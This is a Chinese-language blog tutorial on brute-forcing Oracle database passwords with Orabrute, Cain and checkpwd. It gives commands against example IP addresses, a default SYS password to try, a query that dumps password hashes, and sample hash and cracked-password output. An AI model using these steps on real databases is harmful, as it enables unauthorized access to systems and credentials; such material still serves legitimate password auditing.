• 暴力破解Oracle数据库密码的方法

    暴力破解Oracle数据库密码的方法

    一、前提条件

        要连接远程的 Oracle 数据库,需要知道 SID,用户名, 密码,当然还有最重要的 IP 地址。SID 如果被管理 员修改的话,可以利用 sidguess 来进行破解,速度非常的快,至于成功与否,就要看你的字典配置了。可以得知选择远程破解Oracle 的最好帐户是SYS,因为此帐户永远有效。在Oracle10g以前的版本在安装的时候并没有提示修改SYS 的默认密码,Oracle10g 虽然提示修改密码了,但是并没有检查密码的复杂性。

    二、破解方法

    1、使用Orabrute 工具来进行远程破解

    可以使用Orabrute 工具来进行远程破解,在使用这个工具的时候,需要系统提前安装好Sqlplus,该工具的
    原理很简单,就是不停的调用Sqlplus 然后进行登录验证,帐户选择的是SYS,密码则为password.txt 中的密码单词。只要登录成功,就会调用selectpassword.sql 脚本抓取出在SYS.USER$表中的其他用户的哈希值,然后退出程序。这里有个注意的地方,当第二次运行Orabrute 的时候,需要删除或移动同目录下的前一次运行Orabrute 时生成的thepasswordsarehere.txt 和output.txt 文件。
    Orabrute 的使用方法为:

    D:/soft/oracle/Orabrute>orabrute
    Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
    orabrute <hostip> <port> <sid> <millitimewait>
    D:/soft/oracle/Orabrute>

    Orabrute 的破解速度比较慢,建议在password.txt开头加上诸如change_on_install这样你认为可能的密码。

    D:/soft/oracle/Orabrute>orabrute 172.19.111.37 1521 orcl 2000
    Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
    orabrute <hostip> <port> <sid> <millitimewait>sqlplus.exe -S -L "SYS/change_on_install@172.19.111.37:1521/orcl" as sysdba @selectpassword.sql

    NAME                           PASSWORD
    ------------------------------ ------------------------------
    SYS                            D4C5016086B2DC6A
    PUBLIC
    CONNECT
    RESOURCE
    DBA
    SYSTEM                         D4DF7931AB130E37
    SELECT_CATALOG_ROLE
    EXECUTE_CATALOG_ROLE

    2、使用Cain工具破解Oracle密码

    首先,通过SQLPlus获得用户名和密码的Hash,SQL> select username,password from dba_users;

    USERNAME
    ------------------------------------------------------------
    PASSWORD
    ------------------------------------------------------------
    SYS
    8A8F025737A9097A

    SYSTEM
    2D594E86F93B17A1

    DBSNMP
    FFF45BB2C0C327EC


    USERNAME
    ------------------------------------------------------------
    PASSWORD
    ------------------------------------------------------------
    SYSMAN
    2CA614501F09FCCC

    MGMT_VIEW
    7967E9F7D325932C

    ABC2
    2BC5EEFA22EE5E5E
    其次,安装Cain,安装后的截图如下:

     

     

    最后,利用Cain的crack功能对Oracle的密码进行字典猜解,步骤如下:

     

    第一步:运行cain,点击Craker中的Oracle

    暴力破解Oracle数据库密码的方法

     

    第二步:输入用户名和密码Hash,如:SYS 8A8F025737A9097A

     

    暴力破解Oracle数据库密码的方法

     

    第二步:点击Start,等5分钟后会发现破解的结果

    暴力破解Oracle数据库密码的方法
    暴力破解Oracle数据库密码的方法

    破解后的密码为oracle

    3、  Oracle Checkpasswd_big 破解密码


    C:/oracle_checkpwd_big>checkpwd system/wy@//192.168.1.116:1521/NBO password_file

    下载地址http://www.red-database-security.com/software/checkpwd.html
  • 相关阅读:
    (C#)中断程序流程,处理事件(委托,事件,Lambda表达式)2/3
    (C#) 字符串替换
    (C#基础) 方法的参数修饰符
    (C#基础) 数据类型
    (C#)中断程序流程,处理事件(委托,事件,Lambda表达式)1/3
    (PowerShell) 文件操作
    图像处理基础
    (C#)中断程序流程,处理事件(委托,事件,Lambda表达式)3/3
    迅速理解 XML
    VI命令使用(查找替换)
  • 原文地址:https://www.cnblogs.com/zhang20200703/p/13228695.html
Copyright © 2020-2023  润新知